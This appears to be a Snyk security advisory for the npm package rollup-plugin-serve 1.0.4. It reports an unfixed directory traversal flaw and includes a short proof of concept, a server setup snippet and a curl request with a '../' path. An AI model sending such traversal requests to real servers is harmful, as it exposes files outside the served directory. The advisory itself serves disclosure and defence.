rollup-plugin-serve@1.0.4 vulnerabilities

Serve your rolled up bundle

latest version

3.0.0

first published

9 years ago

latest version published

1 years ago

licenses detected

MIT
>=0

View rollup-plugin-serve package health on Snyk Advisor (opens in a new tab)

Go back to all versions of this package

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the rollup-plugin-serve package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
H Directory Traversal rollup-plugin-serve is a rollup plugin to serve the bundle. Affected versions of this package are vulnerable to Directory Traversal. There is no path sanitization in `readFile` operation. PoC by JHU System Security Lab Step 1: start a server `var server = require("rollup-plugin-serve"); server({ host: 'localhost', port: 9000 })` Step 2: create a file named `file` in the parent directory of the server's home directory. Step 3: `curl -v --path-as-is http://127.0.0.1:9000/../file` How to fix Directory Traversal? There is no fixed version for `rollup-plugin-serve`.	*

Directory Traversal

rollup-plugin-serve is a rollup plugin to serve the bundle.

Affected versions of this package are vulnerable to Directory Traversal. There is no path sanitization in readFile operation.

PoC by JHU System Security Lab

Step 1: start a server

  var server = require("rollup-plugin-serve");
    server({
      host: 'localhost',
      port: 9000
    })

Step 2: create a file named file in the parent directory of the server's home directory.
Step 3: curl -v --path-as-is http://127.0.0.1:9000/../file

How to fix Directory Traversal?

There is no fixed version for rollup-plugin-serve.

Go back to all versions of this package